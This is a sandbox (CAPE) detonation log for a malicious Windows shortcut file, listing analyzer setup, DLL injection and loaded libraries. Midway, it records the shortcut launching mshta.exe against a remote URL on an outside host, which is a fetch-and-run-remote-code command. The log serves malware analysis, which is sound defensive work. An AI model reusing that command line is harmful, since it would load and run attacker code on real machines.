Analysis

Category Package Started Completed Duration
FILE lnk 2020-05-23 00:18:23 2020-05-23 00:24:05 342 seconds
2020-05-13 09:11:26,407 [root] INFO: Date set to: 20200523T00:10:54, timeout set to: 200
2020-05-23 00:10:54,046 [root] DEBUG: Starting analyzer from: C:\tmp52sk_on6
2020-05-23 00:10:54,046 [root] DEBUG: Storing results at: C:\winMkbbUJ
2020-05-23 00:10:54,046 [root] DEBUG: Pipe server name: \\.\PIPE\oUYoZgZ
2020-05-23 00:10:54,046 [root] DEBUG: Python path: C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32
2020-05-23 00:10:54,046 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2020-05-23 00:10:54,046 [root] INFO: Automatically selected analysis package "lnk"
2020-05-23 00:10:54,046 [root] DEBUG: Trying to import analysis package "lnk"...
2020-05-23 00:10:54,062 [root] DEBUG: Imported analysis package "lnk".
2020-05-23 00:10:54,062 [root] DEBUG: Trying to initialize analysis package "lnk"...
2020-05-23 00:10:54,062 [root] DEBUG: Initialized analysis package "lnk".
2020-05-23 00:10:54,093 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.browser"...
2020-05-23 00:10:54,093 [root] DEBUG: Imported auxiliary module "modules.auxiliary.browser".
2020-05-23 00:10:54,093 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.curtain"...
2020-05-23 00:10:54,109 [root] DEBUG: Imported auxiliary module "modules.auxiliary.curtain".
2020-05-23 00:10:54,109 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.digisig"...
2020-05-23 00:10:54,125 [root] DEBUG: Imported auxiliary module "modules.auxiliary.digisig".
2020-05-23 00:10:54,125 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.disguise"...
2020-05-23 00:10:54,140 [root] DEBUG: Imported auxiliary module "modules.auxiliary.disguise".
2020-05-23 00:10:54,140 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.human"...
2020-05-23 00:10:54,140 [root] DEBUG: Imported auxiliary module "modules.auxiliary.human".
2020-05-23 00:10:54,140 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.procmon"...
2020-05-23 00:10:54,156 [root] DEBUG: Imported auxiliary module "modules.auxiliary.procmon".
2020-05-23 00:10:54,156 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.screenshots"...
2020-05-23 00:10:54,156 [modules.auxiliary.screenshots] DEBUG: Importing 'time'
2020-05-23 00:10:54,156 [modules.auxiliary.screenshots] DEBUG: Importing 'StringIO'
2020-05-23 00:10:54,156 [modules.auxiliary.screenshots] DEBUG: Importing 'Thread'
2020-05-23 00:10:54,156 [modules.auxiliary.screenshots] DEBUG: Importing 'Auxiliary'
2020-05-23 00:10:54,156 [modules.auxiliary.screenshots] DEBUG: Importing 'NetlogFile'
2020-05-23 00:10:54,156 [modules.auxiliary.screenshots] DEBUG: Importing 'Screenshot'
2020-05-23 00:10:54,171 [lib.api.screenshot] DEBUG: Importing 'math'
2020-05-23 00:10:54,171 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2020-05-23 00:10:54,296 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'
2020-05-23 00:10:54,312 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2020-05-23 00:10:54,359 [modules.auxiliary.screenshots] DEBUG: Imports OK
2020-05-23 00:10:54,359 [root] DEBUG: Imported auxiliary module "modules.auxiliary.screenshots".
2020-05-23 00:10:54,359 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.sysmon"...
2020-05-23 00:10:54,359 [root] DEBUG: Imported auxiliary module "modules.auxiliary.sysmon".
2020-05-23 00:10:54,359 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.usage"...
2020-05-23 00:10:54,375 [root] DEBUG: Imported auxiliary module "modules.auxiliary.usage".
2020-05-23 00:10:54,375 [root] DEBUG: Trying to initialize auxiliary module "Browser"...
2020-05-23 00:10:54,375 [root] DEBUG: Initialized auxiliary module "Browser".
2020-05-23 00:10:54,375 [root] DEBUG: Trying to start auxiliary module "Browser"...
2020-05-23 00:10:54,375 [root] DEBUG: Started auxiliary module Browser
2020-05-23 00:10:54,375 [root] DEBUG: Trying to initialize auxiliary module "Curtain"...
2020-05-23 00:10:54,375 [root] DEBUG: Initialized auxiliary module "Curtain".
2020-05-23 00:10:54,375 [root] DEBUG: Trying to start auxiliary module "Curtain"...
2020-05-23 00:10:54,390 [root] DEBUG: Started auxiliary module Curtain
2020-05-23 00:10:54,390 [root] DEBUG: Trying to initialize auxiliary module "DigiSig"...
2020-05-23 00:10:54,390 [root] DEBUG: Initialized auxiliary module "DigiSig".
2020-05-23 00:10:54,390 [root] DEBUG: Trying to start auxiliary module "DigiSig"...
2020-05-23 00:10:54,390 [modules.auxiliary.digisig] DEBUG: Checking for a digital signature.
2020-05-23 00:10:56,125 [modules.auxiliary.digisig] DEBUG: File format not recognized.
2020-05-23 00:10:56,125 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-05-23 00:10:56,140 [root] DEBUG: Started auxiliary module DigiSig
2020-05-23 00:10:56,140 [root] DEBUG: Trying to initialize auxiliary module "Disguise"...
2020-05-23 00:10:56,140 [root] DEBUG: Initialized auxiliary module "Disguise".
2020-05-23 00:10:56,140 [root] DEBUG: Trying to start auxiliary module "Disguise"...
2020-05-23 00:10:56,171 [root] DEBUG: Started auxiliary module Disguise
2020-05-23 00:10:56,171 [root] DEBUG: Trying to initialize auxiliary module "Human"...
2020-05-23 00:10:56,171 [root] DEBUG: Initialized auxiliary module "Human".
2020-05-23 00:10:56,171 [root] DEBUG: Trying to start auxiliary module "Human"...
2020-05-23 00:10:56,171 [root] DEBUG: Started auxiliary module Human
2020-05-23 00:10:56,171 [root] DEBUG: Trying to initialize auxiliary module "Procmon"...
2020-05-23 00:10:56,187 [root] DEBUG: Initialized auxiliary module "Procmon".
2020-05-23 00:10:56,187 [root] DEBUG: Trying to start auxiliary module "Procmon"...
2020-05-23 00:10:56,187 [root] DEBUG: Started auxiliary module Procmon
2020-05-23 00:10:56,187 [root] DEBUG: Trying to initialize auxiliary module "Screenshots"...
2020-05-23 00:10:56,187 [root] DEBUG: Initialized auxiliary module "Screenshots".
2020-05-23 00:10:56,187 [root] DEBUG: Trying to start auxiliary module "Screenshots"...
2020-05-23 00:10:56,187 [root] DEBUG: Started auxiliary module Screenshots
2020-05-23 00:10:56,187 [root] DEBUG: Trying to initialize auxiliary module "Sysmon"...
2020-05-23 00:10:56,187 [root] DEBUG: Initialized auxiliary module "Sysmon".
2020-05-23 00:10:56,203 [root] DEBUG: Trying to start auxiliary module "Sysmon"...
2020-05-23 00:10:56,203 [root] DEBUG: Started auxiliary module Sysmon
2020-05-23 00:10:56,203 [root] DEBUG: Trying to initialize auxiliary module "Usage"...
2020-05-23 00:10:56,203 [root] DEBUG: Initialized auxiliary module "Usage".
2020-05-23 00:10:56,203 [root] DEBUG: Trying to start auxiliary module "Usage"...
2020-05-23 00:10:56,203 [root] DEBUG: Started auxiliary module Usage
2020-05-23 00:10:56,203 [root] INFO: Analyzer: Package modules.packages.lnk does not specify a DLL option
2020-05-23 00:10:56,203 [root] INFO: Analyzer: Package modules.packages.lnk does not specify a DLL_64 option
2020-05-23 00:10:56,203 [root] INFO: Analyzer: Package modules.packages.lnk does not specify a loader option
2020-05-23 00:10:56,203 [root] INFO: Analyzer: Package modules.packages.lnk does not specify a loader_64 option
2020-05-23 00:10:56,281 [lib.api.process] INFO: Successfully executed process from path "C:\Windows\system32\cmd.exe" with arguments "/c start /wait "" "C:\Users\Rebecca\AppData\Local\Temp\file.lnk"" with pid 5204
2020-05-23 00:10:56,281 [lib.api.process] INFO: Monitor config for process 5204: C:\tmp52sk_on6\dll\5204.ini
2020-05-23 00:10:56,296 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp52sk_on6\dll\bAkNCjYq.dll, loader C:\tmp52sk_on6\bin\KezQvek.exe
2020-05-23 00:10:56,390 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\oUYoZgZ.
2020-05-23 00:10:56,390 [root] DEBUG: Loader: Injecting process 5204 (thread 5608) with C:\tmp52sk_on6\dll\bAkNCjYq.dll.
2020-05-23 00:10:56,390 [root] DEBUG: Process image base: 0x4A8F0000
2020-05-23 00:10:56,390 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp52sk_on6\dll\bAkNCjYq.dll.
2020-05-23 00:10:56,390 [root] DEBUG: InjectDllViaIAT: Failed to allocate region in target process for new import table.
2020-05-23 00:10:56,406 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2020-05-23 00:10:56,515 [root] DEBUG: Python path set to 'C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32'.
2020-05-23 00:10:56,515 [root] DEBUG: Dropped file limit defaulting to 100.
2020-05-23 00:10:56,531 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 5204 at 0x6a130000, image base 0x4a8f0000, stack from 0xc3000-0x1c0000
2020-05-23 00:10:56,546 [root] DEBUG: Commandline: C:\Users\Rebecca\AppData\Local\Temp\"C:\Windows\system32\cmd.exe" \c start \wait "" "C:\Users\Rebecca\AppData\Local\Temp\file.lnk".
2020-05-23 00:10:56,562 [root] INFO: loaded: b'5204'
2020-05-23 00:10:56,562 [root] INFO: Loaded monitor into process with pid 5204
2020-05-23 00:10:56,562 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2020-05-23 00:10:56,562 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2020-05-23 00:10:56,562 [root] DEBUG: Successfully injected DLL C:\tmp52sk_on6\dll\bAkNCjYq.dll.
2020-05-23 00:10:58,578 [lib.api.process] INFO: Successfully resumed process with pid 5204
2020-05-23 00:10:59,546 [root] DEBUG: DLL loaded at 0x76B60000: C:\Windows\system32\SHELL32 (0xc4c000 bytes).
2020-05-23 00:10:59,546 [root] DEBUG: DLL loaded at 0x74620000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32 (0x19e000 bytes).
2020-05-23 00:10:59,546 [root] DEBUG: DLL loaded at 0x756F0000: C:\Windows\system32\CRYPTBASE (0xc000 bytes).
2020-05-23 00:10:59,562 [root] DEBUG: DLL loaded at 0x743C0000: C:\Windows\system32\PROPSYS (0xf5000 bytes).
2020-05-23 00:10:59,593 [root] DEBUG: DLL loaded at 0x76130000: C:\Windows\system32\CLBCatQ (0x83000 bytes).
2020-05-23 00:10:59,609 [root] DEBUG: DLL loaded at 0x744C0000: C:\Windows\system32\ntmarta (0x21000 bytes).
2020-05-23 00:10:59,609 [root] DEBUG: DLL loaded at 0x75B60000: C:\Windows\system32\WLDAP32 (0x45000 bytes).
2020-05-23 00:10:59,718 [root] DEBUG: DLL loaded at 0x757A0000: C:\Windows\system32\profapi (0xb000 bytes).
2020-05-23 00:10:59,875 [root] DEBUG: DLL loaded at 0x756A0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-05-23 00:10:59,890 [root] DEBUG: DLL loaded at 0x6EB80000: C:\Windows\System32\shdocvw (0x2f000 bytes).
2020-05-23 00:10:59,968 [root] DEBUG: DLL loaded at 0x76530000: C:\Windows\system32\SETUPAPI (0x19d000 bytes).
2020-05-23 00:10:59,968 [root] DEBUG: DLL loaded at 0x75A00000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2020-05-23 00:10:59,968 [root] DEBUG: DLL loaded at 0x75840000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2020-05-23 00:10:59,984 [root] INFO: Disabling sleep skipping.
2020-05-23 00:11:00,000 [root] DEBUG: DLL unloaded from 0x76B60000.
2020-05-23 00:11:00,375 [root] DEBUG: DLL loaded at 0x70700000: C:\PROGRA~1\MICROS~3\Office14\GROOVEEX (0x406000 bytes).
2020-05-23 00:11:00,390 [root] DEBUG: DLL loaded at 0x70E20000: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\MSVCR90 (0xa3000 bytes).
2020-05-23 00:11:00,390 [root] DEBUG: DLL loaded at 0x70D60000: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\MSVCP90 (0x8e000 bytes).
2020-05-23 00:11:00,406 [root] DEBUG: DLL loaded at 0x70D30000: C:\Windows\WinSxS\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_51cd0a7abbe4e19b\ATL90 (0x2b000 bytes).
2020-05-23 00:11:00,406 [root] DEBUG: DLL loaded at 0x74290000: C:\Windows\system32\UxTheme (0x40000 bytes).
2020-05-23 00:11:00,421 [root] DEBUG: DLL loaded at 0x751C0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2020-05-23 00:11:00,421 [root] DEBUG: DLL loaded at 0x74F50000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-05-23 00:11:00,437 [root] DEBUG: DLL loaded at 0x70090000: C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf (0x41a000 bytes).
2020-05-23 00:11:00,437 [root] DEBUG: DLL unloaded from 0x70090000.
2020-05-23 00:11:00,453 [root] DEBUG: DLL loaded at 0x70090000: C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf (0x41a000 bytes).
2020-05-23 00:11:00,468 [root] DEBUG: DLL loaded at 0x6E950000: C:\Windows\system32\LINKINFO (0x9000 bytes).
2020-05-23 00:11:00,484 [root] DEBUG: DLL loaded at 0x70090000: C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf (0x41a000 bytes).
2020-05-23 00:11:00,484 [root] DEBUG: DLL loaded at 0x70090000: C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf (0x41a000 bytes).
2020-05-23 00:11:00,546 [root] DEBUG: DLL loaded at 0x761C0000: C:\Windows\system32\urlmon (0x124000 bytes).
2020-05-23 00:11:00,546 [root] DEBUG: DLL loaded at 0x75AC0000: C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:00,546 [root] DEBUG: DLL loaded at 0x75860000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:00,562 [root] DEBUG: DLL loaded at 0x75AD0000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0 (0x5000 bytes).
2020-05-23 00:11:00,562 [root] DEBUG: DLL loaded at 0x75870000: C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:00,562 [root] DEBUG: DLL loaded at 0x75830000: C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:00,578 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\system32\version (0x9000 bytes).
2020-05-23 00:11:00,578 [root] DEBUG: DLL loaded at 0x75820000: C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0 (0x3000 bytes).
2020-05-23 00:11:00,578 [root] DEBUG: DLL loaded at 0x77910000: C:\Windows\system32\normaliz (0x3000 bytes).
2020-05-23 00:11:00,578 [root] DEBUG: DLL loaded at 0x75E40000: C:\Windows\system32\iertutil (0x215000 bytes).
2020-05-23 00:11:00,640 [root] DEBUG: DLL loaded at 0x766D0000: C:\Windows\system32\WININET (0x1c4000 bytes).
2020-05-23 00:11:00,656 [root] DEBUG: DLL loaded at 0x75480000: C:\Windows\system32\Secur32 (0x8000 bytes).
2020-05-23 00:11:00,718 [root] DEBUG: DLL loaded at 0x71730000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2020-05-23 00:11:01,000 [root] INFO: Announced 32-bit process name: mshta.exe pid: 5952
2020-05-23 00:11:01,000 [lib.api.process] INFO: Monitor config for process 5952: C:\tmp52sk_on6\dll\5952.ini
2020-05-23 00:11:01,015 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp52sk_on6\dll\bAkNCjYq.dll, loader C:\tmp52sk_on6\bin\KezQvek.exe
2020-05-23 00:11:01,031 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\oUYoZgZ.
2020-05-23 00:11:01,031 [root] DEBUG: Loader: Injecting process 5952 (thread 5432) with C:\tmp52sk_on6\dll\bAkNCjYq.dll.
2020-05-23 00:11:01,031 [root] DEBUG: Process image base: 0x00910000
2020-05-23 00:11:01,031 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp52sk_on6\dll\bAkNCjYq.dll.
2020-05-23 00:11:01,046 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-05-23 00:11:01,046 [root] DEBUG: Successfully injected DLL C:\tmp52sk_on6\dll\bAkNCjYq.dll.
2020-05-23 00:11:01,046 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 5952
2020-05-23 00:11:01,109 [root] INFO: Announced 32-bit process name: mshta.exe pid: 5952
2020-05-23 00:11:01,109 [lib.api.process] INFO: Monitor config for process 5952: C:\tmp52sk_on6\dll\5952.ini
2020-05-23 00:11:01,109 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp52sk_on6\dll\bAkNCjYq.dll, loader C:\tmp52sk_on6\bin\KezQvek.exe
2020-05-23 00:11:01,125 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\oUYoZgZ.
2020-05-23 00:11:01,125 [root] DEBUG: Loader: Injecting process 5952 (thread 5432) with C:\tmp52sk_on6\dll\bAkNCjYq.dll.
2020-05-23 00:11:01,125 [root] DEBUG: Process image base: 0x00910000
2020-05-23 00:11:01,140 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp52sk_on6\dll\bAkNCjYq.dll.
2020-05-23 00:11:01,140 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-05-23 00:11:01,140 [root] DEBUG: Successfully injected DLL C:\tmp52sk_on6\dll\bAkNCjYq.dll.
2020-05-23 00:11:01,140 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 5952
2020-05-23 00:11:01,140 [root] DEBUG: DLL loaded at 0x6A370000: C:\Windows\system32\sfc (0x3000 bytes).
2020-05-23 00:11:01,140 [root] DEBUG: DLL loaded at 0x6A380000: C:\Windows\system32\sfc_os (0xd000 bytes).
2020-05-23 00:11:01,234 [root] DEBUG: DLL unloaded from 0x6A370000.
2020-05-23 00:11:01,249 [root] DEBUG: DLL unloaded from 0x70700000.
2020-05-23 00:11:01,265 [root] DEBUG: Python path set to 'C:\Users\Rebecca\AppData\Local\Programs\Python\Python38-32'.
2020-05-23 00:11:01,265 [root] DEBUG: Dropped file limit defaulting to 100.
2020-05-23 00:11:01,281 [root] INFO: Disabling sleep skipping.
2020-05-23 00:11:01,281 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-05-23 00:11:01,281 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 5952 at 0x6a130000, image base 0x910000, stack from 0x2e6000-0x2f0000
2020-05-23 00:11:01,281 [root] DEBUG: DLL unloaded from 0x761C0000.
2020-05-23 00:11:01,296 [root] DEBUG: Commandline: C:\Windows\"C:\Windows\System32\msHta.Exe" http:\www.nrots.net\images\5328C28B\15936\11348\7c8d64e9\e17e25e.
2020-05-23 00:11:01,296 [root] INFO: loaded: b'5952'
2020-05-23 00:11:01,296 [root] INFO: Loaded monitor into process with pid 5952
2020-05-23 00:11:01,312 [root] DEBUG: DLL loaded at 0x756F0000: C:\Windows\System32\CRYPTBASE (0xc000 bytes).
2020-05-23 00:11:01,312 [root] DEBUG: DLL unloaded from 0x76B60000.
2020-05-23 00:11:01,312 [root] DEBUG: DLL unloaded from 0x6EB80000.
2020-05-23 00:11:03,062 [root] DEBUG: DLL loaded at 0x661E0000: C:\Windows\System32\mshtml (0x1062000 bytes).
2020-05-23 00:11:03,078 [root] DEBUG: DLL loaded at 0x75860000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:03,078 [root] DEBUG: DLL loaded at 0x75AC0000: C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:03,078 [root] DEBUG: DLL loaded at 0x761C0000: C:\Windows\system32\urlmon (0x124000 bytes).
2020-05-23 00:11:03,078 [root] DEBUG: DLL loaded at 0x766D0000: C:\Windows\system32\WININET (0x1c4000 bytes).
2020-05-23 00:11:03,109 [root] DEBUG: DLL loaded at 0x76130000: C:\Windows\system32\CLBCatQ (0x83000 bytes).
2020-05-23 00:11:03,109 [root] DEBUG: DLL loaded at 0x75CB0000: C:\Windows\system32\OLEAUT32 (0x91000 bytes).
2020-05-23 00:11:03,125 [root] DEBUG: DLL loaded at 0x74290000: C:\Windows\System32\UxTheme (0x40000 bytes).
2020-05-23 00:11:03,140 [root] DEBUG: DLL loaded at 0x74620000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32 (0x19e000 bytes).
2020-05-23 00:11:03,140 [root] DEBUG: DLL loaded at 0x75480000: C:\Windows\System32\Secur32 (0x8000 bytes).
2020-05-23 00:11:03,156 [root] DEBUG: DLL loaded at 0x6D9E0000: C:\Windows\System32\api-ms-win-downlevel-shlwapi-l2-1-0 (0x4000 bytes).
2020-05-23 00:11:03,171 [root] DEBUG: DLL loaded at 0x76B60000: C:\Windows\system32\shell32 (0xc4c000 bytes).
2020-05-23 00:11:03,187 [root] DEBUG: DLL loaded at 0x757A0000: C:\Windows\System32\profapi (0xb000 bytes).
2020-05-23 00:11:03,187 [root] DEBUG: DLL loaded at 0x71730000: C:\Windows\System32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2020-05-23 00:11:03,218 [root] DEBUG: DLL loaded at 0x75D50000: C:\Windows\system32\WS2_32 (0x35000 bytes).
2020-05-23 00:11:03,218 [root] DEBUG: DLL loaded at 0x779C0000: C:\Windows\system32\NSI (0x6000 bytes).
2020-05-23 00:11:03,234 [root] DEBUG: DLL loaded at 0x6F380000: C:\Windows\system32\winhttp (0x58000 bytes).
2020-05-23 00:11:03,234 [root] DEBUG: DLL loaded at 0x6F330000: C:\Windows\system32\webio (0x50000 bytes).
2020-05-23 00:11:03,234 [root] DEBUG: DLL unloaded from 0x6F380000.
2020-05-23 00:11:03,249 [root] DEBUG: DLL loaded at 0x75180000: C:\Windows\system32\mswsock (0x3c000 bytes).
2020-05-23 00:11:03,249 [root] DEBUG: DLL loaded at 0x73C60000: C:\Windows\System32\IPHLPAPI (0x1c000 bytes).
2020-05-23 00:11:03,249 [root] DEBUG: DLL loaded at 0x73B10000: C:\Windows\System32\WINNSI (0x7000 bytes).
2020-05-23 00:11:03,249 [root] DEBUG: DLL loaded at 0x75170000: C:\Windows\System32\wship6 (0x6000 bytes).
2020-05-23 00:11:03,343 [root] DEBUG: DLL loaded at 0x75040000: C:\Windows\System32\DNSAPI (0x44000 bytes).
2020-05-23 00:11:03,343 [root] DEBUG: DLL loaded at 0x739F0000: C:\Windows\System32\dhcpcsvc6 (0xd000 bytes).
2020-05-23 00:11:03,343 [root] DEBUG: DLL loaded at 0x70CC0000: C:\Windows\System32\netprofm (0x5a000 bytes).
2020-05-23 00:11:03,359 [root] DEBUG: DLL loaded at 0x73F00000: C:\Windows\System32\nlaapi (0x10000 bytes).
2020-05-23 00:11:03,359 [root] DEBUG: DLL loaded at 0x73970000: C:\Windows\System32\dhcpcsvc (0x12000 bytes).
2020-05-23 00:11:03,359 [root] DEBUG: DLL loaded at 0x74D00000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2020-05-23 00:11:03,375 [root] DEBUG: DLL loaded at 0x6BF80000: C:\Windows\System32\ieframe (0xaba000 bytes).
2020-05-23 00:11:03,375 [root] DEBUG: DLL loaded at 0x6BF70000: C:\Windows\System32\api-ms-win-downlevel-shell32-l1-1-0 (0x4000 bytes).
2020-05-23 00:11:03,375 [root] DEBUG: DLL loaded at 0x71EA0000: C:\Windows\System32\rasadhlp (0x6000 bytes).
2020-05-23 00:11:03,390 [root] DEBUG: DLL loaded at 0x751C0000: C:\Windows\System32\CRYPTSP (0x17000 bytes).
2020-05-23 00:11:03,390 [root] DEBUG: DLL loaded at 0x73440000: C:\Windows\system32\msimtf (0xb000 bytes).
2020-05-23 00:11:03,390 [root] DEBUG: DLL loaded at 0x74F50000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-05-23 00:11:03,406 [root] DEBUG: DLL loaded at 0x75790000: C:\Windows\System32\RpcRtRemote (0xe000 bytes).
2020-05-23 00:11:03,406 [root] DEBUG: DLL loaded at 0x6B3F0000: C:\Windows\System32\OLEACC (0x3c000 bytes).
2020-05-23 00:11:03,421 [root] DEBUG: DLL loaded at 0x75700000: C:\Windows\System32\SXS (0x5f000 bytes).
2020-05-23 00:11:03,421 [root] DEBUG: DLL loaded at 0x6DF50000: C:\Windows\System32\npmproxy (0x8000 bytes).
2020-05-23 00:11:17,671 [root] DEBUG: DLL loaded at 0x6DF10000: C:\Windows\System32\msls31 (0x31000 bytes).
2020-05-23 00:11:17,687 [root] DEBUG: DLL loaded at 0x68340000: C:\Windows\System32\d2d1 (0x347000 bytes).
2020-05-23 00:11:17,703 [root] DEBUG: DLL loaded at 0x68C70000: C:\Windows\System32\DWrite (0x136000 bytes).
2020-05-23 00:11:17,703 [root] DEBUG: DLL loaded at 0x71750000: C:\Windows\System32\dxgi (0x4c000 bytes).
2020-05-23 00:11:17,718 [root] DEBUG: DLL loaded at 0x73DB0000: C:\Windows\System32\dwmapi (0x13000 bytes).
2020-05-23 00:11:17,718 [root] DEBUG: DLL loaded at 0x76530000: C:\Windows\system32\setupapi (0x19d000 bytes).
2020-05-23 00:11:17,734 [root] DEBUG: DLL loaded at 0x75A00000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2020-05-23 00:11:17,734 [root] DEBUG: DLL loaded at 0x75840000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2020-05-23 00:11:17,734 [root] DEBUG: DLL loaded at 0x75AE0000: C:\Windows\system32\WINTRUST (0x2f000 bytes).
2020-05-23 00:11:17,750 [root] DEBUG: DLL loaded at 0x758D0000: C:\Windows\system32\CRYPT32 (0x122000 bytes).
2020-05-23 00:11:17,750 [root] DEBUG: DLL loaded at 0x75810000: C:\Windows\system32\MSASN1 (0xc000 bytes).
2020-05-23 00:11:17,750 [root] DEBUG: DLL unloaded from 0x76530000.
2020-05-23 00:11:17,781 [root] DEBUG: DLL loaded at 0x76530000: C:\Windows\system32\setupapi (0x19d000 bytes).
2020-05-23 00:11:17,781 [root] DEBUG: DLL loaded at 0x75A00000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2020-05-23 00:11:17,781 [root] DEBUG: DLL loaded at 0x75840000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2020-05-23 00:11:17,796 [root] DEBUG: DLL unloaded from 0x75B10000.
2020-05-23 00:11:17,796 [root] DEBUG: DLL loaded at 0x71590000: C:\Windows\System32\d3d11 (0x175000 bytes).
2020-05-23 00:11:17,828 [root] DEBUG: DLL loaded at 0x68150000: C:\Windows\System32\D3D10Warp (0x1ea000 bytes).
2020-05-23 00:11:17,828 [root] DEBUG: DLL loaded at 0x76530000: C:\Windows\system32\setupapi (0x19d000 bytes).
2020-05-23 00:11:17,843 [root] DEBUG: DLL loaded at 0x75A00000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2020-05-23 00:11:17,843 [root] DEBUG: DLL loaded at 0x75840000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2020-05-23 00:11:17,843 [root] DEBUG: DLL unloaded from 0x76530000.
2020-05-23 00:11:17,875 [root] DEBUG: DLL loaded at 0x76530000: C:\Windows\system32\setupapi (0x19d000 bytes).
2020-05-23 00:11:17,875 [root] DEBUG: DLL loaded at 0x75A00000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2020-05-23 00:11:17,875 [root] DEBUG: DLL loaded at 0x75840000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2020-05-23 00:11:17,890 [root] DEBUG: DLL unloaded from 0x75B10000.
2020-05-23 00:11:17,890 [root] DEBUG: DLL unloaded from 0x68150000.
2020-05-23 00:11:53,406 [root] DEBUG: DLL unloaded from 0x762F0000.
2020-05-23 00:14:18,687 [root] INFO: Analysis timeout hit, terminating analysis.
2020-05-23 00:14:18,687 [lib.api.process] INFO: Terminate event set for process 5204
2020-05-23 00:14:18,703 [root] DEBUG: Terminate Event: Attempting to dump process 5204
2020-05-23 00:14:18,734 [root] INFO: b'C:\\winMkbbUJ\\CAPE\\5204_124369281818142222552020|5204|0;?C:\\Windows\\System32\\cmd.exe;?C:\\Windows\\System32\\cmd.exe;?'
2020-05-23 00:14:18,734 [root] INFO: cape
2020-05-23 00:14:18,734 [root] INFO: ('dump_file', 'C:\\winMkbbUJ\\CAPE\\5204_124369281818142222552020', b'0;?C:\\Windows\\System32\\cmd.exe;?C:\\Windows\\System32\\cmd.exe;?', ['5204'], 'procdump')
2020-05-23 00:14:18,765 [root] INFO: ('dump_file', 'C:\\winMkbbUJ\\CAPE\\5204_124369281818142222552020', '', False, 'files')
2020-05-23 00:14:18,781 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x49e00.
2020-05-23 00:14:18,781 [lib.api.process] INFO: Termination confirmed for process 5204
2020-05-23 00:14:18,781 [root] INFO: Terminate event set for process 5204.
